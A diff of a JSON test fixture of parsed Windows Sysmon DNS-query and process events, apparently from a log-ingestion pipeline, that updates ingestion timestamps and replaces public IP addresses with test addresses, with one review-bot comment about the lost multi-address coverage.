Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -6744,7 +6661,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741537Z", + "ingested": "2021-12-09T13:50:23.456922900Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802587100Z'/\u003e\u003cEventRecordID\u003e118\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.315\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -6818,7 +6735,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741545500Z", + "ingested": "2021-12-09T13:50:23.456928900Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802678700Z'/\u003e\u003cEventRecordID\u003e119\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.315\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -6871,7 +6788,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741556300Z", + "ingested": "2021-12-09T13:50:23.456934800Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.981137800Z'/\u003e\u003cEventRecordID\u003e5\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.981\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cdf4-5c8f-0000-0010e61e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4616\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\AppData\\Local\\Temp\\Sysmon.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -6935,11 +6852,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6947,7 +6864,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -6955,7 +6872,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -6963,7 +6880,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -6971,21 +6888,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -7001,22 +6918,22 @@ "ocsp.usertrust.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741562600Z", + "ingested": "2021-12-09T13:50:23.456942400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", 
"provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7084,17 +7001,17 @@ "type": "CNAME" }, { - "data": "23.50.53.179", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.176", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.179", - "23.50.53.176" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
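Review bot: In this hunk's `resolved_ip` both former answers (23.50.53.179 and 23.50.53.176) are mapped to the same 89.160.20.156, so the fixture now carries a duplicated answer and the following hunk shows `related.ip` shrinking from two entries to one — the multi-address case this event previously exercised is lost. If the supported subset contains a second address, using it for the second answer would keep that coverage. The IPv6 answers in the neighbouring hunks (e.g. 2001:503:a83e::2:30) keep their original public values while the IPv4 ones were rewritten to 192.168.x.30, so please confirm that asymmetry is intended. This looks like generated expected output, so any adjustment belongs in the test input log rather than in this file.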
@@ -7111,14 +7028,13 @@ "isrg.trustid.ocsp.identrust.com" ], "ip": [ - "23.50.53.179", - "23.50.53.176" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741566300Z", + "ingested": "2021-12-09T13:50:23.456948500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7182,12 +7098,12 @@ "type": "CNAME" }, { - "data": "172.217.6.198", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.6.198" + "89.160.20.156" ] }, "network": { 
@@ -7203,13 +7119,13 @@ "ad.doubleclick.net" ], "ip": [ - "172.217.6.198" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741572200Z", + "ingested": "2021-12-09T13:50:23.456954300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -7260,7 +7176,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741578200Z", + "ingested": "2021-12-09T13:50:23.456960100Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.981137800Z'/\u003e\u003cEventRecordID\u003e6\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.981\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cdf4-5c8f-0000-0010071e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4648\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\Downloads\\Sysmon.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7324,11 +7240,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -7336,7 +7252,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -7344,7 +7260,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -7352,7 +7268,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -7360,21 +7276,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -7390,22 +7306,22 @@ "ocsp.sectigo.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741585600Z", + "ingested": "2021-12-09T13:50:23.456966100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
